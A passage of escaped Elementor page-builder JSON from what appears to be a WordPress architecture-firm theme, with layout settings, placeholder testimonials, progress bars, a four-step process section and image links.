left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\